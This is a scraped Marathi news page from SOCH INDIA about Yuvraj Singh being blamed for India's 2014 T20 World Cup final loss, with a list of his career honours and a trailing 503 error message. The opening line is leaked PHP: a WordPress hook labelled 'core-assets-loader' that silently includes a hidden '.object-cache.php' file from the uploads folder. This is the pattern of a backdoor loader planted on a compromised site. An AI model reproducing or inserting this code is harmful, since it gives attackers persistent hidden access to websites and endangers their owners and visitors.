add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); अवघ्या एका खेळीमुळे ‘हिट’ युवराज ठरला ‘फ्लॉप’ – SOCH INDIA
Menu

खेल
अवघ्या एका खेळीमुळे ‘हिट’ युवराज ठरला ‘फ्लॉप’

nobanner

सोमवार ७ एप्रिल २०१४ ऑनलाइन टीम मुंबई, दि. ७ – टी-२० वर्ल्डकपमधील फायनल सामन्यात भारताला श्रीलंकेविरुद्ध पराभव पत्करावा लागला आणि टीम इंडियाच दुस-यांदा ‘टी-२० वर्ल्डकप’ जिंकण्याचं स्वप्न भंगलं. क्रिकेट हा सांघिक कामगिरीचा खेळ असतानाही कालच्या पराभवासाठी मुख्य जबाबादार धरलं गेलं ते युवराज सिंगला. धावांसाठी चाचपडणा-या युवराजने २१ चेंडूत अवघ्या ११ धावा केल्या. भारताला मोठी धावसंख्या उभारायची गरज असतानाच युवीच्या चांगली खेळी करण्यात अपयशी ठरला आणि सर्वांनी त्याच्यावरच खापर फोडले. ट्विटर, फेसबूक, व्हॉट्सअ‍ॅप या सोशल नेटवर्किंग साईट्स व अ‍ॅप्सवरून युवीवर टीका करणा-या आणि त्याची खिल्ली उडवणा-या मेसेजेसचा भडिमार झाला. त्याच्या एका वाईट खेळीमुळे त्याने आत्तापर्यंत केलेल्या चांगल्या कामगिरीचा सर्वांनाच विसर पडला. २०११ साली भारताला वर्ल्डकप जिंकून देऊन, सर्वांच्या लाडक्या सचिन तेंडुलकरचे २२ वर्षांचे स्वप्न पूर्ण करण्यासाठी देणा-यांमध्ये युवराजचा सिंहाचा वाटा होता. त्याच युवराजने एकाच षटकात ६ सिक्सर मारत एक अनोखी खेळी करत प्रेक्षकांच्या डोळ्यांचे पारणे फेडले होते. क्रिकेटला देव मानणारे भारतीयप्रेक्षक त्या खेळाडूंनाही देव्हा-यात नेऊन ठेवतात, त्यांचा उदोउदो करतात, पण जर एखादी वाईट कामगिरी झाली, तर त्याच खेळाडूंना तेथून खाली खेचून पराकोटीची टीका करतात. काल एका मॅचमध्ये अपयशी ठरलेल्या युवीने आत्तापर्यंत भारताची मान अनेकवेळा उंचावली आहे, अनेक अविस्मरणीय खेळी केल्या आहेत, मात्र दुर्दैवाने ते कोणाच्याच लक्षात नाहीये. युवराज सिंगची अविस्मरणीय कारकीर्द : अंडर १५ वर्ल्डकप १९९६ चॅम्पियन – भारत मॅन ऑफ दि सीरिज – युवराज सिंग अंडर १९ वर्ल्डकप चॅम्पियन – भारत मॅन ऑफ दि सीरिज – युवराज सिंग टी-२० वर्ल्डकप चॅम्पियन – भारत बेस्ट प्लेयर – युवराज सिंग आयसीसी वर्ल्डकप २०११ चॅम्पियन – भारत मॅन ऑफ दि सीरिज – युवराज सिंग

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.